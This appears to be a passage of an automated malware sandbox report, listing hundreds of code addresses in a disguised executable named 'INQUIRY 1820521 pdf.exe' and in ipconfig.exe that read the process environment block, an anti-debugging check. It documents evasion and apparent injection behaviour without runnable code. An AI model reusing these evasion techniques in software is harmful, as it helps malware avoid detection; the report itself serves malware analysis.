Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015E8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_016005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_016005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015635A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01608CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01608F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0160070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0160070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01534F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01534F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015737F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01548794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015FAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0156A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01568E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015EFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01578EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015636CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015EFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01608ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015616E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015476E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015CFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015B46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03274F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03274F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0330FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0330FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0334070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0334070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03348F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03348B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03345BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03281B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03281B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0332D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03288794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0332FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03288A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03293A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03275210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0332B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0332B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03348A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03304257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0330FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032876E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03348ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0332FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03348D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03294120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]
